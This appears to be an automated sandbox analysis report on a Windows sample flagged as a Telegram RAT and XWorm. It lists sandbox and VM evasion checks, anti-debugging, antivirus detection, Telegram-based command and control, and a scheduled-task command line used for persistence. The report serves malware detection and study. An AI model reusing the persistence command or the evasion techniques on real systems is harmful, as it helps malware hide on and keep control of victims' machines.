Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: WV7Gj9lJ7W.exe, 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: WV7Gj9lJ7W.exe, svchost.exe.0.dr Binary or memory string: SBIEDLL.DLL)M9XAQTYORYTFKMYYFRL0)ESEPKMVNRVOAIMO0TS5J)5SV1GLMSOR7I5HCRJHB6)TAVJK7ZOHZPL02SA3EFM)MKAC3LTH4B04KZGDMQFR)SECJYPQFD4M8G0GH2RTP)QMBDWWNGWRBSQBCKFZZR)VHEQVCCWSSRQRH4OZ8QT)EEJCEOZ5E1DFKLJ9MYLU)R1ULFCIGSXP2MUANNY1X)7PH9KMYOJ7FQIE4A2GXA)HBZ6KRKMOSC82EMMA9XU)QYRSKEIP7H2R7DZIDLIG)A4PZEQPMXXIWLBFPYND6)ZNCUUGIYTYORWJ00SAUQINFO
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Memory allocated: 1340000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Memory allocated: 1AF50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 2610000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1A610000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: BD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1290000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 2E10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1AE10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 5D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1A4A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1350000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1AEA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 990000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1A4A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 11A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 1B0A0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599262 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599152 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599035 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598921 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598812 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598593 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598265 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598047 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 597937 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 597718 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 597609 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Window / User API: threadDelayed 1451 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Window / User API: threadDelayed 8399 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -35971150943733603s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -599874s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -599262s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -599152s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -599035s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -598921s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -598812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -598703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -598593s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -598484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -598375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -598265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -598156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -598047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -597937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -597828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -597718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe TID: 3452 Thread sleep time: -597609s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 5544 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 4632 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 5440 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3544 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3176 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6164 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6480 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599262 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599152 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 599035 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598921 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598812 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598593 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598265 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 598047 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 597937 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 597718 Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Thread delayed: delay time: 597609 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: svchost.exe.0.dr Binary or memory string: vmware
Source: svchost.exe.0.dr Binary or memory string: Quf7Q3Zt3QDCV4GUwvAb8GR9kDgPDvG2RqHE7VHvmcihFjJIvnIjGZFVuxgK
Source: WV7Gj9lJ7W.exe, 00000000.00000002.4140218363.000000001BD56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Code function: 0_2_00007FFD9B8B7BE1 CheckRemoteDebuggerPresent, 0_2_00007FFD9B8B7BE1
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Process queried: DebugPort Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior

Language, Device and Operating System Detection
barindex
Yara detected Telegram Recon
Source: Yara match File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Queries volume information: C:\Users\user\Desktop\WV7Gj9lJ7W.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: WV7Gj9lJ7W.exe, 00000000.00000002.4134841867.0000000001193000.00000004.00000020.00020000.00000000.sdmp, WV7Gj9lJ7W.exe, 00000000.00000002.4140218363.000000001BD56000.00000004.00000020.00020000.00000000.sdmp, WV7Gj9lJ7W.exe, 00000000.00000002.4141955412.000000001C780000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected Telegram RAT
Source: Yara match File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match File source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Yara detected XWorm
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match File source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4135621688.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected Telegram RAT
Source: Yara match File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match File source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Yara detected XWorm
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match File source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4135621688.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: WV7Gj9lJ7W.exe PID: 6880, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561588 Sample: WV7Gj9lJ7W.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 25 api.telegram.org 2->25 27 ip-api.com 2->27 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 43 19 other signatures 2->43 8 WV7Gj9lJ7W.exe 15 6 2->8         started        13 svchost.exe 1 2->13         started        15 svchost.exe 2->15         started        17 5 other processes 2->17 signatures3 41 Uses the Telegram API (likely for C&C communication) 25->41 process4 dnsIp5 29 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->29 31 api.telegram.org 149.154.167.220, 443, 49731 TELEGRAMRU United Kingdom 8->31 33 104.198.168.179, 1337, 49732 GOOGLEUS United States 8->33 23 C:\Users\user\AppData\Local\...\svchost.exe, PE32 8->23 dropped 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->45 47 Protects its processes via BreakOnTermination flag 8->47 49 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->49 57 3 other signatures 8->57 19 schtasks.exe 1 8->19         started        51 Antivirus detection for dropped 